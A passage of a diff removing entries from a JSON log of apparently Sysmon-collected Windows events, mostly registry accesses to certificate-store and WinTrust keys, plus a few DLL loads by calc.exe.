"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ieframe.dll", - "image_path": "C:\\Windows\\System32\\ieframe.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", 
- "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243080000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "mlang.dll", - "image_path": "C:\\Windows\\System32\\mlang.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": 
"Certificates", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245119984, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 
2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 